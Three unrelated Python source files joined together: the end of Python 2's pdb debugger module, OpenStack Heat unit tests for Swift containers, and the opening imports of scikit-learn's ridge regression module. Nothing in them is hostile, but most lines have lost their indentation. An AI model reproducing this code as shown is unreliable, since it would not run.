return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
        print >>self.stdout, """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns."""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
        print >>self.stdout, """run [args...]
Restart the debugged python program. If a string is supplied, it is
split with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' that executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
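    # Illustrative behaviour (paths are hypothetical): with sys.path[0] set
    # to '/home/user/project' and that directory containing mymodule.py,
    # lookupmodule('mymodule') returns '/home/user/project/mymodule.py';
    # it returns None when the name resolves nowhere on sys.path.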
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
        statement = 'execfile(%r)' % filename
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
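# Typical use of the simplified interface above (illustrative snippets):
#
#   import pdb
#   pdb.set_trace()        # break into the debugger at the call site
#
# and, after an uncaught exception at the interactive prompt:
#
#   >>> pdb.pm()           # post-mortem debugging of sys.last_traceback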
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print '*** Pager exit status:', sts
break
else:
print 'Sorry, can\'t find the help file "pdb.doc"',
print 'along the Python search path'
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while True:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print "The program finished and will be restarted"
except Restart:
print "Restarting", mainpyfile, "with arguments:"
print "\t" + " ".join(sys.argv[1:])
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
except:
traceback.print_exc()
print "Uncaught exception. Entering post mortem debugging"
print "Running 'cont' or 'step' will restart the program"
t = sys.exc_info()[2]
pdb.interaction(None, t)
print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
import swiftclient.client as sc
from heat.common import exception
from heat.common import template_format
from heat.engine.resources.openstack.swift import swift
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
SWIFT_TEMPLATE = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "Template to test OS::Swift::Container resources",
"Resources" : {
"SwiftContainerWebsite" : {
"Type" : "OS::Swift::Container",
"DeletionPolicy" : "Delete",
"Properties" : {
"X-Container-Read" : ".r:*",
"X-Container-Meta" : {
"Web-Index" : "index.html",
"Web-Error" : "error.html"
}
}
},
"SwiftAccountMetadata" : {
"Type" : "OS::Swift::Container",
"DeletionPolicy" : "Delete",
"Properties" : {
"X-Account-Meta" : {
"Temp-Url-Key" : "secret"
}
}
},
"S3Bucket" : {
"Type" : "AWS::S3::Bucket",
"Properties" : {
"SwiftContainer" : {"Ref" : "SwiftContainer"}
}
},
"SwiftContainer" : {
"Type" : "OS::Swift::Container",
"Properties" : {
}
}
}
}
'''
class SwiftTest(common.HeatTestCase):
def setUp(self):
super(SwiftTest, self).setUp()
self.t = template_format.parse(SWIFT_TEMPLATE)
def _create_container(self, stack, definition_name='SwiftContainer'):
resource_defns = stack.t.resource_definitions(stack)
container = swift.SwiftContainer('test_resource',
resource_defns[definition_name],
stack)
runner = scheduler.TaskRunner(container.create)
runner()
self.assertEqual((container.CREATE, container.COMPLETE),
container.state)
return container
@mock.patch('swiftclient.client.Connection.put_container')
def test_create_container_name(self, mock_put):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['name'] = 'the_name'
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
container_name = container.physical_resource_name()
# Verify
self.assertEqual('the_name', container_name)
mock_put.assert_called_once_with('the_name', {})
def test_build_meta_headers(self):
# Setup
headers = {'Web-Index': 'index.html', 'Web-Error': 'error.html'}
# Test
self.assertEqual({}, swift.SwiftContainer._build_meta_headers(
'container', {}))
self.assertEqual({}, swift.SwiftContainer._build_meta_headers(
'container', None))
built = swift.SwiftContainer._build_meta_headers('container', headers)
# Verify
expected = {
'X-Container-Meta-Web-Index': 'index.html',
'X-Container-Meta-Web-Error': 'error.html'
}
self.assertEqual(expected, built)
@mock.patch('swiftclient.client.Connection.head_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_attributes(self, mock_put, mock_head):
# Setup
headers = {'content-length': '0',
'x-container-object-count': '82',
'accept-ranges': 'bytes',
'x-trans-id': 'tx08ea48ef2fa24e6da3d2f5c188fd938b',
'date': 'Wed, 23 Jan 2013 22:48:05 GMT',
'x-timestamp': '1358980499.84298',
'x-container-read': '.r:*',
'x-container-bytes-used': '17680980',
'content-type': 'text/plain; charset=utf-8'}
mock_head.return_value = headers
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
# Verify Attributes
self.assertEqual(container_name, container.FnGetRefId())
self.assertEqual('82', container.FnGetAtt('ObjectCount'))
self.assertEqual('17680980', container.FnGetAtt('BytesUsed'))
self.assertEqual('server.test', container.FnGetAtt('DomainName'))
self.assertEqual(headers, container.FnGetAtt('HeadContainer'))
self.assertEqual(headers, container.FnGetAtt('show'))
expected_url = 'http://server.test:5000/v3/%s' % container.FnGetRefId()
self.assertEqual(expected_url, container.FnGetAtt('WebsiteURL'))
self.assertRaises(exception.InvalidTemplateAttribute,
container.FnGetAtt, 'Foo')
# Verify Expected Calls
mock_put.assert_called_once_with(container_name, {})
self.assertTrue(mock_head.call_count > 0)
@mock.patch('swiftclient.client.Connection.put_container')
def test_public_read(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
properties = self.t['Resources']['SwiftContainer']['Properties']
properties['X-Container-Read'] = '.r:*'
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack)
# Verify
expected = {'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_public_read_write(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
properties = self.t['Resources']['SwiftContainer']['Properties']
properties['X-Container-Read'] = '.r:*'
properties['X-Container-Write'] = '.r:*'
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack)
# Verify
expected = {'X-Container-Write': '.r:*', 'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_container_headers(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack,
definition_name='SwiftContainerWebsite')
# Verify
expected = {'X-Container-Meta-Web-Error': 'error.html',
'X-Container-Meta-Web-Index': 'index.html',
'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.post_account')
@mock.patch('swiftclient.client.Connection.put_container')
def test_account_headers(self, mock_put, mock_post):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack,
definition_name='SwiftAccountMetadata')
# Verify
mock_put.assert_called_once_with(container_name, {})
expected = {'X-Account-Meta-Temp-Url-Key': 'secret'}
mock_post.assert_called_once_with(expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_default_headers_not_none_empty_string(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
# Verify
mock_put.assert_called_once_with(container_name, {})
self.assertEqual({}, container.metadata_get())
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_exception(self, mock_put, mock_get, mock_delete):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_delete.side_effect = sc.ClientException('test-delete-failure')
mock_get.return_value = ({'name': container_name}, [])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_not_found(self, mock_put, mock_get, mock_delete):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_delete.side_effect = sc.ClientException('missing',
http_status=404)
mock_get.return_value = ({'name': container_name}, [])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_not_allowed(self, mock_put, mock_get):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
ex = self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
self.assertIn('ResourceActionNotSupported: resources.test_resource: '
'Deleting non-empty container',
six.text_type(ex))
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_allowed(self, mock_put, mock_get,
mock_delete_object,
mock_delete_container):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
get_return_values = [
({'name': container_name},
[{'name': 'test_object1'},
{'name': 'test_object2'}]),
({'name': container_name}, [{'name': 'test_object1'}]),
]
mock_get.side_effect = get_return_values
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_delete_container.assert_called_once_with(container_name)
self.assertEqual(2, mock_get.call_count)
self.assertEqual(2, mock_delete_object.call_count)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_allowed_not_found(self, mock_put, mock_get,
mock_delete_object,
mock_delete_container):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
mock_delete_object.side_effect = sc.ClientException('object-is-gone',
http_status=404)
mock_delete_container.side_effect = sc.ClientException(
'container-is-gone', http_status=404)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete_object.assert_called_once_with(container_name,
'test_object')
mock_delete_container.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_fails_delete_object(self, mock_put, mock_get,
mock_delete_object):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
mock_delete_object.side_effect = (
sc.ClientException('object-delete-failure'))
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete_object.assert_called_once_with(container_name,
'test_object')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_retain(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
self.t['Resources']['SwiftContainer']['DeletionPolicy'] = 'Retain'
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_check(self, mock_put, mock_get):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.check)
runner()
self.assertEqual((container.CHECK, container.COMPLETE),
container.state)
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_check_fail(self, mock_put, mock_get):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.side_effect = Exception('boom')
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.check)
ex = self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertIn('boom', six.text_type(ex))
self.assertEqual((container.CHECK, container.FAILED),
container.state)
def test_refid(self):
stack = utils.parse_stack(self.t)
rsrc = stack['SwiftContainer']
rsrc.resource_id = 'xyz'
self.assertEqual('xyz', rsrc.FnGetRefId())
def test_refid_convergence_cache_data(self):
cache_data = {'SwiftContainer': {
'uuid': mock.ANY,
'id': mock.ANY,
'action': 'CREATE',
'status': 'COMPLETE',
'reference_id': 'xyz_convg'
}}
stack = utils.parse_stack(self.t, cache_data=cache_data)
rsrc = stack['SwiftContainer']
self.assertEqual('xyz_convg', rsrc.FnGetRefId())
|
|
"""
Ridge regression
"""
# Author: Mathieu Blondel <[email protected]>
# Reuben Fletcher-Costin <[email protected]>
# Fabian Pedregosa <[email protected]>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
import warnings
import numpy as np
from scipy import linalg
from scipy import sparse
from scipy.sparse import linalg as sp_linalg
from .base import LinearClassifierMixin, LinearModel
from ..base import RegressorMixin
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
